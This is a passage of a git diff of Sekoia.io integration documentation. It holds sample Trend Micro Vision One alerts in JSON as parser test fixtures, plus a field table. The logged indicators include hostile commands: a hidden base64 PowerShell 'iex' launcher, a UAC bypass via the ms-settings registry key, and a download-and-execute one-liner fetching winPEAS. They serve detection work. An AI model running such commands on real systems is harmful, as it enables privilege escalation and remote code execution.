Default Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"a32599b7-c0c9-45ed-97bf-f2be7679fb00\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}, {\"id\": \"857b6396-da29-44a8-bc11-25298e646795\", \"name\": \"Bypass UAC Via Shell Open Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"T1088\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"4c456bbb-2dfc-40a5-b298-799a0ccefc01\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....XggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....jY0KTtpZXggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"registry_value\", \"field\": \"objectRegistryValue\", \"value\": \"delegateexecute\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"registry_value_data\", \"field\": \"objectRegistryData\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Privilege Escalation via UAC Bypass", + "type": [ + "info" + ], + "url": "https://THE_WORKBENCH_URL" + }, + "@timestamp": "2022-09-06T02:49:31Z", + "container": { + "id": "7d1e00176d78b2b1db0744a187314bf2ce39f3a7d43137c366ae6785e8a4f496", + "name": "k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0" + }, + "host": { + "id": "35FA11DA-A24E-40CF-8B56-BAF8828CC15E", + "ip": [ + "10.10.58.51" + ], + "name": "nimda" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "c:\\windows\\system32\\rundll32.exe c:\\users\\sam\\appdata\\local\\cyzfc.dat entrypoint", + "parent": { + "command_line": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....XggJHNjQjs=')); iex $r; " + } + }, + "registry": { + "data": { + "strings": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x", + "type": "REG_SZ" + }, + "hive": "hkcr", + "key": "ms-settings\\shell\\open\\command", + "path": "hkcr\\ms-settings\\shell\\open\\command\\hkcr\\ms-settings\\shell\\open\\command\\delegateexecute", + "value": "delegateexecute" + }, + "related": { + "ip": [ + "10.10.58.51" + ], + "user": [ + "sam" + ] + }, + "rule": { + "name": "Privilege Escalation via UAC Bypass" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-9002-20220906-00022", + "case_id": "CL-1-20230706-00001", + "incident_id": "IC-1-20230706-00001", + "investigation_status": "New", + "severity": "high", + "status": "Open" + } + }, + "user": { + "domain": "shockwave", + "email": "support@pctutordetroit.com", + "id": "shockwave\\sam", + "name": "sam" + } + } + + ``` + + +=== "test_service_abuse.json" + + ```json + + { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"ce2af827-6dfc-4c5b-ab40-ab4b82351c83\", \"model\": \"Possible Web Service Abuse\", \"modelType\": \"preset\", \"score\": 39, \"severity\": \"medium\", \"createdDateTime\": \"2024-11-26T16:45:28Z\", \"updatedDateTime\": \"2024-11-26T16:45:28Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"name\": \"windows10\", \"ips\": [\"20.193.45.33\"]}, \"entityId\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"ce9c7ad6-f895-4907-bf57-e34b59d4dc90\"}]}, \"description\": \"The adversary attempted to download a payload stored on a legitimate external web service.\", \"matchedRules\": [{\"id\": \"ef13e37e-148e-48d6-819f-021f4acfcace\", \"name\": \"Suspicious Powershell Connection To Web Service\", \"matchedFilters\": [{\"id\": \"97e70752-3b27-4db0-b840-507d3f37ffe6\", \"name\": \"Suspicious Powershell Connection To Web Service - Variant 2\", \"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"mitreTechniqueIds\": [\"T1102\"], \"matchedEvents\": [{\"uuid\": \"4aed361f-de80-4679-bf18-608b2afe5ff7\", \"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"type\": \"TELEMETRY_AMSI\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"amsi_rawDataStr\", \"field\": \"objectRawDataStr\", \"value\": \"IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"amsi_rawDataStr\", \"field\": \"objectRawDataStr\", \"value\": \"<#\\n.SYNOPSIS\\n PowerShell adaptation of WinPEAS.exe / WinPeas.bat\\n.DESCRIPTION\\n For the legal enumeration of windows based computers that you either own or are approved to run this script on\\n.EXAMPLE\\n # Default - normal operation with username/password audit in drives/registry\\n .\\\\winPeas.ps1\\n\\n # Include Excel files in search: .xls, .xlsx, .xlsm\\n .\\\\winPeas.ps1 -Excel\\n\\n # Full audit - normal operation with APIs / Keys / Tokens\\n ## This will produce false positives ## \\n .\\\\winPeas.ps1 -FullCheck \\n\\n # Add Time stamps to each command\\n .\\\\winPeas.ps1 -TimeStamp\\n\\n.NOTES\\n Version: 1.3\\n PEASS-ng Original Author: PEASS-ng\\n winPEAS.ps1 Author: @RandolphConley\\n Creation Date: 10/4/2022\\n Website: https://github.com/peass-ng/PEASS-ng\\n\\n TESTED: PoSh 5,7\\n UNTESTED: PoSh 3,4\\n NOT FULLY COMPATIBLE: PoSh 2 or lower\\n#>\\n\\n######################## FUNCTIONS ########################\\n\\n[CmdletBinding()]\\nparam(\\n [switch]$TimeStamp,\\n [switch]$FullCheck,\\n [switch]$Excel\\n)\\n\\n# Gather KB from all patches installed\\nfunction returnHotFixID {\\n param(\\n [string]$title\\n )\\n # Match on KB or if patch does not have a KB, return end result\\n if (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n return (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value)\\n }\\n elseif (($title | Select-String -NotMatch -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n return (($title | Select-String -NotMatch -Pattern 'KB(\\\\d{4,6})').Matches.Value)\\n }\\n}\\n\\nFunction Start-ACLCheck {\\n param(\\n $Target, $ServiceName)\\n # Gather ACL of object\\n if ($null -ne $target) {\\n try {\\n $ACLObject = Get-Acl $target -ErrorAction SilentlyContinue\\n }\\n catch { $null }\\n \\n # If Found, Evaluate Permissions\\n if ($ACLObject) { \\n $Identity = @()\\n $Identity += \\\"$env:COMPUTERNAME\\\\$env:USERNAME\\\"\\n if ($ACLObject.Owner -like $Identity ) { Write-Host \\\"$Identity has ownership of $Target\\\" -ForegroundColor Red }\\n # This should now work for any language. Command runs whoami group, removes the first two line of output, converts from csv to object, but adds \\\"group name\\\" to the first column.\\n whoami.exe /groups /fo csv | select-object -skip 2 | ConvertFrom-Csv -Header 'group name' | Select-Object -ExpandProperty 'group name' | ForEach-Object { $Identity += $_ }\\n $IdentityFound = $false\\n foreach ($i in $Identity) {\\n $permission = $ACLObject.Access | Where-Object { $_.IdentityReference -like $i }\\n $UserPermission = \\\"\\\"\\n switch -WildCard ($Permission.FileSystemRights) {\\n \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n \\\"Write*\\\" { $userPermission = \\\"Write\\\"; $IdentityFound = $true }\\n \\\"Modify\\\" { $userPermission = \\\"Modify\\\"; $IdentityFound = $true }\\n }\\n Switch ($permission.RegistryRights) {\\n \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n }\\n if ($UserPermission) {\\n if ($ServiceName) { Write-Host \\\"$ServiceName found with permissions issue:\\\" -ForegroundColor Red }\\n Write-Host -ForegroundColor red \\\"Identity $($permission.IdentityReference) has '$userPermission' perms for $Target\\\"\\n }\\n } \\n # Identity Found Check - If False, loop through and stop at root of drive\\n if ($IdentityFound -eq $false) {\\n if ($Target.Length -gt 3) {\\n $Target = Split-Path $Target\\n Start-ACLCheck $Target -ServiceName $ServiceName\\n }\\n }\\n }\\n else {\\n # If not found, split path one level and Check again\\n $Target = Split-Path $Target\\n Start-ACLCheck $Target $ServiceName\\n }\\n }\\n}\\n\\nFunction UnquotedServicePathCheck {\\n Write-Host \\\"Fetching the list of services, this may take a while...\\\";\\n $services = Get-WmiObject -Class Win32_Service | Where-Object { $_.PathName -inotmatch \\\"`\\\"\\\" -and $_.PathName -inotmatch \\\":\\\\\\\\Windows\\\\\\\\\\\" -and ($_.StartMode -eq \\\"Auto\\\" -or $_.StartMode -eq \\\"Manual\\\") -and ($_.State -eq \\\"Running\\\" -or $_.State -eq \\\"Stopped\\\") };\\n if ($($services | Measure-Object).Count -lt 1) {\\n Write-Host \\\"No unquoted service paths were found\\\";\\n }\\n else {\\n $services | ForEach-Object {\\n Write-Host \\\"Unquoted Service Path found!\\\" -ForegroundColor red\\n Write-Host Name: $_.Name\\n Write-Host PathName: $_.PathName\\n Write-Host StartName: $_.StartName \\n Write-Host StartMode: $_.StartMode\\n Write-Host Running: $_.State\\n } \\n }\\n}\\n\\nfunction TimeElapsed { Write-Host \\\"Time Running: $($stopwatch.Elapsed.Minutes):$($stopwatch.Elapsed.Seconds)\\\" }\\nFunction Get-ClipBoardText {\\n Add-Type -AssemblyName PresentationCore\\n $text = [Windows.Clipboard]::GetText()\\n if ($text) {\\n Write-Host \\\"\\\"\\n if ($TimeStamp) { TimeElapsed }\\n Write-Host -ForegroundColor Blue \\\"=========|| ClipBoard text found:\\\"\\n Write-Host $text\\n \\n }\\n}\\n\\nFunction Search-Excel {\\n [cmdletbinding()]\\n Param (\\n [parameter(Mandatory, ValueFromPipeline)]\\n [ValidateScript({\\n Try {\\n If (Test-Path -Path $_) {$True}\\n \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Windows10\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Possible Web Service Abuse", + "type": [ + "info" + ], + "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000" + }, + "@timestamp": "2024-11-26T16:45:28Z", + "action": { + "properties": { + "ScriptBlockText": "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')" + } + }, + "host": { + "id": "e930412e-e09c-454b-a508-576ba266b9d8", + "ip": [ + "20.193.45.33" + ], + "name": "windows10" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe\" ", + "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", + "hash": { + "sha256": "440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF" + }, + "parent": { + "command_line": "C:\\Windows\\Explorer.EXE", + "pid": 9920 + }, + "pid": 5040 + }, + "related": { + "hash": [ + "440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF" + ], + "ip": [ + "20.193.45.33" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "Possible Web Service Abuse" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "investigation_status": "New", + "severity": "medium", + "status": "Open" + } + }, + "user": { + "domain": "windows10", + "id": "windows10\\jdoe", + "name": "jdoe" + } + } + + ``` + + + + + +### Extracted Fields + +The following table lists the fields that are extracted, normalized under the ECS format, analyzed and indexed by the parser. It should be noted that infered fields are not listed. + +| Name | Type | Description | +| ---- | ---- | ---------------------------| +|`@timestamp` | `date` | Date/time when the event originated. | +|`action.properties.ScriptBlockText` | `keyword` | | +|`container.id` | `keyword` | Unique container id. | +|`container.name` | `keyword` | Container name. | +|`event.action` | `keyword` | The action captured by the event. | +|`event.category` | `keyword` | Event category. The second categorization field in the hierarchy. | +|`event.kind` | `keyword` | The kind of the event. The highest categorization field in the hierarchy. | +|`event.reason` | `keyword` | Reason why this event happened, according to the source | +|`event.type` | `keyword` | Event type. The third categorization field in the hierarchy. | +|`event.url` | `keyword` | Event investigation URL | +|`file.hash.sha1` | `keyword` | SHA1 hash. | +|`file.hash.sha256` | `keyword` | SHA256 hash. | +|`file.name` | `keyword` | Name of the file including the extension, without the directory. | +|`file.path` | `keyword` | Full path to the file, including the file name. | +|`host.id` | `keyword` | Unique host id. | +|`host.ip` | `ip` | Host ip addresses. | +|`host.name` | `keyword` | Name of the host. | +|`observer.product` | `keyword` | The product name of the observer. | +|`observer.vendor` | `keyword` | Vendor name of the observer. | +|`process.command_line` | `wildcard` | Full command line that started the process. | +|`process.executable` | `keyword` | Absolute path to the process executable. | +|`process.hash.sha1` | `keyword` | SHA1 hash. | +|`process.hash.sha256` | `keyword` | SHA256 hash. | +|`process.parent.command_line` | `wildcard` | Full command line that started the process. | +|`process.parent.executable` | `keyword` | Absolute path to the process executable. | +|`process.parent.hash.sha1` | `keyword` | SHA1 hash. | +|`process.parent.hash.sha256` | `keyword` | SHA256 hash. | +|`process.parent.pid` | `long` | Process id. | +|`process.pid` | `long` | Process id. | +|`registry.data.strings` | `wildcard` | List of strings representing what was written to the registry. | +|`registry.data.type` | `keyword` | Standard registry type for encoding contents | +|`registry.hive` | `keyword` | Abbreviated name for the hive. | +|`registry.key` | `keyword` | Hive-relative path of keys. | +|`registry.path` | `keyword` | Full path, including hive, key and value | +|`registry.value` | `keyword` | Name of the value written. | +|`rule.id` | `keyword` | Rule ID | +|`rule.name` | `keyword` | Rule name | +|`trendmicro.vision_one.alert_id` | `keyword` | | +|`trendmicro.vision_one.case_id` | `keyword` | | +|`trendmicro.vision_one.detection_name` | `keyword` | | +|`trendmicro.vision_one.incident_id` | `keyword` | | +|`trendmicro.vision_one.investigation_status` | `keyword` | | +|`trendmicro.vision_one.severity` | `keyword` | | +|`trendmicro.vision_one.status` | `keyword` | | +|`user.domain` | `keyword` | Name of the directory the user is a member of. | +|`user.email` | `keyword` | User email address. | +|`user.id` | `keyword` | Unique identifier of the user. | +|`user.name` | `keyword` | Short name or login of the user. | + + + +For more information on the Intake Format, please find the code of the Parser, Smart Descriptions, and Supported Events [here](https://github.com/SEKOIA-IO/intake-formats/tree/main/Trend Micro/trend-micro-vision-one-workbench). \ No newline at end of file diff --git a/_shared_content/operations_center/integrations/generated/9844ea0a-de7f-45d4-9a9b-b07651f0630e_sample.md b/_shared_content/operations_center/integrations/generated/9844ea0a-de7f-45d4-9a9b-b07651f0630e_sample.md new file mode 100644 index 000000000..e73f41b2e --- /dev/null +++ b/_shared_content/operations_center/integrations/generated/9844ea0a-de7f-45d4-9a9b-b07651f0630e_sample.md @@ -0,0 +1,2339 @@ + +### Raw Events Samples + +In this section, you will find examples of raw logs as generated natively by the source. These examples are provided to help integrators understand the data format before ingestion into Sekoia.io. It is crucial for setting up the correct parsing stages and ensuring that all relevant information is captured. + + +=== "test_eicar_test_file_detection" + + + ```json + { + "schemaVersion": "1.15", + "id": "WB-11111-22222222-00000", + "investigationStatus": "New", + "status": "Open", + "investigationResult": "No Findings", + "workbenchLink": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000", + "alertProvider": "SAE", + "modelId": "dee5c874-1032-4f7a-baec-8ed1ef0be1af", + "model": "Eicar Test File Detection", + "modelType": "preset", + "score": 20, + "severity": "low", + "createdDateTime": "2024-11-26T16:51:29Z", + "updatedDateTime": "2024-11-26T16:51:29Z", + "ownerIds": [], + "impactScope": { + "desktopCount": 1, + "serverCount": 0, + "accountCount": 0, + "emailAddressCount": 0, + "containerCount": 0, + "cloudIdentityCount": 0, + "entities": [ + { + "entityType": "host", + "entityValue": { + "guid": "ecede9e8-407e-4f34-9747-4a145c247ad5", + "name": "windows10", + "ips": [ + "10.0.0.6" + ] + }, + "entityId": "ecede9e8-407e-4f34-9747-4a145c247ad5", + "relatedEntities": [], + "relatedIndicatorIds": [ + 1, + 2, + 3, + 4, + 5, + 6 + ], + "provenance": [ + "Alert" + ], + "managementScopeGroupId": "110299e0-d3a0-499f-9ec3-e35ab5c2c702" + } + ] + }, + "description": "Eicar test file is detected in the system.", + "matchedRules": [ + { + "id": "1ce01ccb-d930-4a1f-9e64-c1a117344f32", + "name": "Eicar Test File Detection", + "matchedFilters": [ + { + "id": "4c2fd712-e89a-440a-b789-9bfcd8afd443", + "name": "VSAPI Eicar Detection", + "matchedDateTime": "2024-11-26T16:44:04.000Z", + "mitreTechniqueIds": [], + "matchedEvents": [ + { + "uuid": "2bd63c5f-7394-4c3e-9a3c-acc77d0a43dd", + "matchedDateTime": "2024-11-26T16:44:04.000Z", + "type": "PRODUCT_EVENT_LOG" + } + ] + } + ] + } + ], + "indicators": [ + { + "id": 1, + "type": "detection_name", + "field": "malName", + "value": "Eicar_test_1", + "relatedEntities": [ + "ecede9e8-407e-4f34-9747-4a145c247ad5" + ], + "filterIds": [ + "4c2fd712-e89a-440a-b789-9bfcd8afd443" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 2, + "type": "file_sha1", + "field": "fileHash", + "value": "667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8", + "relatedEntities": [ + "ecede9e8-407e-4f34-9747-4a145c247ad5" + ], + "filterIds": [ + "4c2fd712-e89a-440a-b789-9bfcd8afd443" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 3, + "type": "filename", + "field": "fileName", + "value": "eicar-com.txt", + "relatedEntities": [ + "ecede9e8-407e-4f34-9747-4a145c247ad5" + ], + "filterIds": [ + "4c2fd712-e89a-440a-b789-9bfcd8afd443" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 4, + "type": "fullpath", + "field": "fullPath", + "value": "C:\\Users\\jdoe\\Downloads\\eicar-com.txt", + "relatedEntities": [ + "ecede9e8-407e-4f34-9747-4a145c247ad5" + ], + "filterIds": [ + "4c2fd712-e89a-440a-b789-9bfcd8afd443" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 5, + "type": "text", + "field": "endpointHostName", + "value": "WINDOWS10", + "relatedEntities": [ + "ecede9e8-407e-4f34-9747-4a145c247ad5" + ], + "filterIds": [ + "4c2fd712-e89a-440a-b789-9bfcd8afd443" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 6, + "type": "text", + "field": "actResult", + "value": "File quarantined", + "relatedEntities": [ + "ecede9e8-407e-4f34-9747-4a145c247ad5" + ], + "filterIds": [ + "4c2fd712-e89a-440a-b789-9bfcd8afd443" + ], + "provenance": [ + "Alert" + ] + } + ] + } + ``` + + + +=== "test_information_gathering" + + + ```json + { + "schemaVersion": "1.15", + "id": "WB-11111-22222222-00000", + "investigationStatus": "New", + "status": "Open", + "investigationResult": "No Findings", + "workbenchLink": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000", + "alertProvider": "SAE", + "modelId": "b4e0f834-178b-4a3d-a5ef-d44c603d1a48", + "model": "Potential Information Gathering", + "modelType": "preset", + "score": 22, + "severity": "low", + "createdDateTime": "2024-11-26T16:48:06Z", + "updatedDateTime": "2024-11-26T16:48:06Z", + "ownerIds": [], + "impactScope": { + "desktopCount": 1, + "serverCount": 0, + "accountCount": 1, + "emailAddressCount": 0, + "containerCount": 0, + "cloudIdentityCount": 0, + "entities": [ + { + "entityType": "account", + "entityValue": "windows10\\jdoe", + "entityId": "windows10\\jdoe", + "relatedEntities": [ + "7b00c266-f17f-439f-bb94-3945d463a78b" + ], + "relatedIndicatorIds": [], + "provenance": [ + "Alert" + ] + }, + { + "entityType": "host", + "entityValue": { + "guid": "7b00c266-f17f-439f-bb94-3945d463a78b", + "name": "windows10", + "ips": [ + "10.0.0.6" + ] + }, + "entityId": "7b00c266-f17f-439f-bb94-3945d463a78b", + "relatedEntities": [ + "windows10\\jdoe" + ], + "relatedIndicatorIds": [ + 1, + 2, + 3, + 4, + 5, + 6, + 7, + 8, + 9, + 10, + 11, + 12, + 13, + 14, + 15, + 16, + 17, + 18, + 19, + 20 + ], + "provenance": [ + "Alert" + ], + "managementScopeGroupId": "7f56b5b6-4fba-42b1-a1c8-d4fa64300f4a" + } + ] + }, + "description": "A process has executed multiple discovery tools.", + "matchedRules": [ + { + "id": "1be9b378-eb8a-4736-92ba-55c184b2ca55", + "name": "Potential Information Gathering", + "matchedFilters": [ + { + "id": "7062d4bd-33ca-4634-8f04-a7e4e8698548", + "name": "WhoAmI Execution", + "matchedDateTime": "2024-11-26T16:41:05.352Z", + "mitreTechniqueIds": [ + "T1033" + ], + "matchedEvents": [ + { + "uuid": "54955525-b5ac-4b31-b5b7-0e03ba25aa4a", + "matchedDateTime": "2024-11-26T16:41:05.352Z", + "type": "TELEMETRY_PROCESS" + } + ] + }, + { + "id": "3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb", + "name": "IPconfig Execution", + "matchedDateTime": "2024-11-26T16:44:46.602Z", + "mitreTechniqueIds": [ + "T1016" + ], + "matchedEvents": [ + { + "uuid": "7a733f00-faa0-4ac2-b97c-34d8f3ffd230", + "matchedDateTime": "2024-11-26T16:44:46.602Z", + "type": "TELEMETRY_PROCESS" + } + ] + } + ] + } + ], + "indicators": [ + { + "id": 1, + "type": "command_line", + "field": "objectCmd", + "value": "\"C:\\Windows\\system32\\whoami.exe\"", + "relatedEntities": [ + "7b00c266-f17f-439f-bb94-3945d463a78b" + ], + "filterIds": [ + "7062d4bd-33ca-4634-8f04-a7e4e8698548" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 2, + "type": "command_line", + "field": "processCmd", + "value": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe\" ", + "relatedEntities": [ + "7b00c266-f17f-439f-bb94-3945d463a78b" + ], + "filterIds": [ + "7062d4bd-33ca-4634-8f04-a7e4e8698548" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 3, + "type": "command_line", + "field": "parentCmd", + "value": "C:\\Windows\\Explorer.EXE", + "relatedEntities": [ + "7b00c266-f17f-439f-bb94-3945d463a78b" + ], + "filterIds": [ + "7062d4bd-33ca-4634-8f04-a7e4e8698548" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 4, + "type": "command_line", + "field": "objectCmd", + "value": "\"C:\\Windows\\system32\\ipconfig.exe\" /all ", + "relatedEntities": [ + "7b00c266-f17f-439f-bb94-3945d463a78b" + ], + "filterIds": [ + "3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 5, + "type": "command_line", + "field": "processCmd", + "value": 